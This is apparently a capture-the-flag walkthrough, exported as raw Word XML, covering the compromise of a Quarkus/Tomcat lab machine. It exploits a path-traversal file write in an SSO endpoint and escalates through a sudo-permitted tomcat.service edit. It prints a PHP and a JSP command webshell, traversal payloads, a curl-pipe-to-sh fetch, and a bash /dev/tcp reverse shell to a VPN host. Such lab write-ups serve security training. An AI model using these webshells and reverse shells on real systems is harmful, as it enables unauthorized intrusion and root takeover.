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Quarkus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r7p857ust8l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Ports:</w:t>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73300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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knkdwdddnrsd" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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mrfmot3vxuu4" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</w:t>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use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which uses an existing wordlist of possible common directory names and will attempt to load all directory names in that wordlist and then check the status code. (If you are using Kali or ParrotOS, you can find these wordlists in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you can use the ones from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seclist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73"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While fuzzing files we can find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we will download it to our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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unzip backup.zip</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7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Quarkus </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a Java framework tailored for Kubernetes deployments. The main technology components surrounding it are OpenJDK HotSpot and GraalVM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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analyze these files using → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JD-GUI.</w:t>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JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.</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open</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> backup.zip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with jd-gui.</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36900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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530600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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code of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthController.class</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see that we control two parameters → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipaddress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name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port 8080, we can find</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /sso</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51300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /sso</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and intercept it with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BurpSuite</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71"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here we have our parameters =)</w:t>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copy the response and paste it into the body of our request. We need to change the method from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and change the content-type to →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> json</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bk8af4give9m" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</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saw in the code, the application will execute a curl request looking for the local-ipv4 object and save it to /tmp. Since we control both parameters, we can write a webshell as the content of local-ipv4. This way, we can perform a path traversal and write to any directory we want, and we can also change the file extension.</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ipaddress we will pass our VPN IP, otherwise it will make a request to localhost.</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Another interesting detail is that id must be 1 for it to print the object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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10000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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Let’s GO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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First, I will create the directories →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> latest/meta-data</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6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Inside the meta-data directory, I will create a PHP webshell, which will be the content of local-ipv4.</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system($_GET['cmd']); ?&gt;</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9800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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a Python server to listen on port 1338, which is the port defined in the code.</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6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go to Burp.</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"name":"../var/www/html/wshell.php",</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"sso_provider":"aws",</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"id":1,</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"ipaddress":"&lt;IP-VPN&gt;"</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00300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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request, we can see on our Python server that it fetched our local-ipv4 object.</w:t>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32000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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can access our webshell on port 80.</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6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managed to get a reverse shell =)</w:t>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now start the Python server to serve our reverse shell:</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25700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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66"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now, we can use curl to get the reverse shell =)</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&lt;IP-VPN&gt;/shell.sh | sh</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51225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="43648" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="15512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have a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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84400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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38dtu0aby055" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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fully interactive TTYs.</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47900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90"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root directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can retrieve our first flag.</w:t>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enumerating the server to try to escalate privileges, I couldn’t find anything, so I moved to another approach: getting a reverse shell as the tomcat user. We just need to find the full path to write a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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write to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/tomcat/webapps/sso</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78"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change the local-ipv4 payload to a JSP webshell.</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 page import="java.util.*,java.io.*"%&gt;</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JSP_KIT</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cmd.jsp = Command Execution (unix)</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by: Unknown</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modified: 27/06/2003</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&lt;HTML&gt;&lt;BODY&gt;</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 METHOD="GET" NAME="myform" ACTION=""&gt;</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&lt;INPUT TYPE="text" NAME="cmd"&gt;</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&lt;INPUT TYPE="submit" VALUE="Send"&gt;</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&lt;/FORM&gt;</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&lt;pre&gt;</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(request.getParameter("cmd") != null) {</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out.println("Command: " + request.getParameter("cmd") + "&lt;BR&gt;");</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Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));</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OutputStream os = p.getOutputStream();</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InputStream in = p.getInputStream();</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DataInputStream dis = new DataInputStream(in);</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String disr = dis.readLine();</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while ( disr != null ) {</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out.println(disr);</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disr = dis.readLine();</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&lt;/pre&gt;</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&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6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921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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"name":"../usr/share/tomcat/webapps/sso/wshell.jsp",</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"sso_provider":"aws",</w:t>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"id":1,</w:t>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"ipaddress":"&lt;IP-VPN&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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35200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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can access our webshell on port 8081 →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /sso/wshell.jsp</w:t>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88"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then get a reverse shell as the tomcat user =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Payload:</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8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/dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Python server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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curl &lt;IP-VPN&gt;/shell.sh -o /tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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55800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.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9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90800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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execute our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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/tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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9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74900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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oq5f59cx0c6u" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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spawning a TTY we can run the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>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verified that we have permission to run the following commands as root without a password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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(ALL) NOPASSWD: /bin/systemctl restart tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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(ALL) NOPASSWD: /bin/systemctl daemon-reload</w:t>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then find the tomcat service configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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systemctl status tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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68500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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next step is to edit this file →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/lib/systemd/system/tomcat.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and change the tomcat user to root, so it will start the tomcat application as the root user =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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75"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run the commands below to reload the file, saving our new configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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/bin/systemctl restart tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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57"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wait for the application to start again =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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our webshell on port 8081, we can see that we are now the root user. Then just grab a reverse shell, and for that we can use our payload saved in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp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86683"/>
